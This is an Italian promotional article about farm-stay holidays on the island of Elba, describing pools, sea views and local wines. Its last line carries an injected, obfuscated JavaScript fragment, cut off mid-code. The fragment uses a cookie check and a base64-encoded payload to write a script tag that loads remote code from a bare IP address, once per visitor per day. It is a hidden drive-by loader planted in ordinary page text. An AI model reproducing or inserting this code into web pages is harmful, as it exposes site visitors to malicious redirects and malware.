Scelta rurale per le vacanze estive: in agriturismo sull’isola d’elba
Se siete amanti della campagna e dell’accoglienza semplice, un agriturismo all’Elba è il posto giusto per il vostro prossimo soggiorno. Nati come semplici casali, gran parte degli agriturismi sull’Isola d’Elba si sono evoluti nel corso degli anni offrendo sempre più comfort, ma senza perdere l’originario spirito agricolo. La domanda di agriturismo sull’Isola d’Elba si è notevolmente modificata nel tempo, coinvolgendo sempre più amanti della natura, della buona cucina e dei prezzi generalmente modesti.
Dalle fattorie didattiche che illustrano le proprie attività all’agriturismo sull’Isola d’Elba con piscina, l’offerta di questo tipo di strutture è eterogenea ed in costante crescita. Inizialmente concentrati nelle zone collinari, ora non è difficile trovare anche un agriturismo all’Elba sul mare, come richiesto da chi vuole conciliare l’aspetto bucolico alla vicinanza della spiaggia.
Gli agriturismi dell’Elba sono preziosi per la conservazione del paesaggio e la valorizzazione del territorio, un turismo fatto di piccoli alberghi di charme, B&B o relais ormai svincolati dalla concreta attività agricola, ma accomunati dallo stesso spirito rurale. Se gli agriturismi all’Isola d’Elba sul mare sono molto quotati d’estate, per chi cerca un luogo dove rigenerarsi, un agriturismo all’Elba è il luogo ideale per concedersi un weekend rilassante tutto l’anno, in camere circondate da frutteti o vigneti ed una pace sorprendente.
Potrebbe capitarvi un agriturismo in Toscana o all’Elba senza radio o TV: saranno i grilli o il frusciare dei rami a farvi da colonna sonora. Scegliete un agriturismo dell’Isola d’Elba vicino al mare e da lì concedetevi una passeggiata a piedi, in bici o a cavallo, l’isola saprà sempre sorprendervi. Un agriturismo sull’Isola d’Elba con mare cristallino a portata di mano immersi nel verde è forse il meglio che si possa chiedere. Immaginatevi in un agriturismo all’Elba con piscina sdraiati a gustarvi un bicchiere di vino, magari un Elba Bianco o un Aleatico, che ne pensate? _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘